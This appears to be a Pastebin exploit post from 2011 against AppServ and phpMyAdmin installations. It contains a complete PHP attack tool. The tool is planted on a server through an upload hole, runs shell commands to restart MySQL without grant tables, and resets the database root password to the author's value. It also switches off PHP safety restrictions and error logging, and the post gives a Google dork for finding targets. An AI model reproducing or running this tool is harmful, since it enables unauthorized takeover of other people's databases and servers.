Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: [phpMyAdmin Root Password]
- # Date: [21/6/2011]
- # Home: 1337day.com
- # Author: [Piaster (wadelamin)]
- # phpmyadmin: Software Link: [www.appservnetwork.com ||www.phpmyadmin.net]
- # Version: [all phpmyadmin Version]
- # Category:: [remote, local]
- # Google dork: [inurl:phpMyAdmin || The AppServ Open Project - [all Version] for Windows ]
- # Tested on: [Windows & unix]
- # E-mail: [email protected]
- # Page: http://www.facebook.com/Pias.Piaster
- File Bug:
- //-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------//
- echo "Welcome to AppServ MySQL Root Password Reset Program\n\n";
- AppServCMD();
- function AppServCMD() {
- define('STDIN',fopen("php://stdin","r"));
- echo " Enter New Password : ";
- $input = trim(fgets(STDIN,256));
- $input = ereg_replace('\"', "\\\"", $input);
- $input = ereg_replace('\'', "\'", $input);
- echo "\n Please wait ...................................\n\n";
- exec ("net stop mysql");
- exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
- //You can add a password and then request the file via the browser
- exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\"");
- exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown");
- sleep(3);
- exec ("net start mysql");
- }
- //--------------------------------END-----------------------------------//
- I've modified the file and then request the file from abroad
- But first there must be a upload exploit on server so they can upload the tool like any other tool or Shell Script
- And then request the file via the browser
- There Important Note:
- If the Windows server can access phpMyAdmin immediately
- if the file to complete the process this means that
- it is restarted the Mysql and then change the password.
- //---------------------------------Exploit the vulnerability tool------------------------//
- <?
- echo "<style type='text/css'>* { margin: 0; padding: 0; }A {color:#ffffff;text-decoration:none;}A:hover {color:yellow;text-decoration:underline;}body,table { font-family:verdana;font-size:11px;color:white;background-color:#993333; }.table5 { font-family:verdana;font-size:11px;color:white;background-color:black; }table { width:30%; }table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }input{ color:#000000;border:2px solid #666666; }.barheader,.mainpaneltable,td { border:1px solid #333333; }.input{ border:2px gold;margin:0; }input[type='submit'] { border:1px solid black; } input[type='text'] { padding:5px;}input[type='button'] { background-color:gold; }.select,option,input[type='button']:hover { background-color:red; }input[type='submit'] { background-color:orange }.select,option,input[type='submit']:hover { background-color:red; }input,input[type='text']:hover { background-color:#AF2C07; }textarea,.mainpanel input,select,option { background-color:orange; }</style>";echo "<head><title>PiAsTeR VS phpMyAdmin</title><div style=\"background: orange;\"><p align=\"center\"><font size=\"2\" <h1><font color = red><b>PiAsTeR</font> VS <font color = red>phpMyAdmin</font></h1></b></p><hr color=\"black\"</div></div><center><BR>";$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>';
- @set_time_limit(0);
- @ini_restore("safe_mode");
- @ini_restore("allow_url_fopen");
- @ini_restore("open_basedir");
- @ini_restore("disable_functions");
- @ini_restore("safe_mode_exec_dir");
- @ini_restore("safe_mode_include_dir");
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- $win = strtolower(substr(PHP_OS,0,3)) == "win";
- if(function_exists('exec')){$pias = exec;}
- elseif(function_exists('shell_exec')){$pias = shell_exec;}
- elseif(function_exists('system')) {$pias = system ;}
- elseif(function_exists('passthru')) { $pias = passthru ;}
- if($win) {
- define('STDIN',fopen("php://stdin","r"));
- $input = trim(fgets(STDIN,256));
- $input = ereg_replace('\"', "\\\"", $input);
- $input = ereg_replace('\'', "\'", $input);
- echo "\n Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
- $pias("net stop mysql");
- $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
- $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
- $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
- sleep(3);
- $pias("net start mysql");}
- if(!$win) {
- echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';
- if(isset($_REQUEST['pias'])){
- $dbu = $_REQUEST['dbu'];
- $dbp = $_REQUEST['dbp'];
- $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
- $conn = @mysql_connect($dbh, $dbu, $dbp);
- $select = @mysql_select_db('mysql', $conn);
- if (!$select) {
- echo @mysql_error();}
- $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
- $go1 = @mysql_query( $t1 , $conn);
- if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
- else echo 'database mysql not acsses or not found ty agin';}}
- ?>
- //---------------------------------Exploit the vulnerability tool end--------------------//
- My Notes : all i can say Awesome !
- it working fine on all servers system !
Advertisement
Add Comment
Please, Sign In to add comment
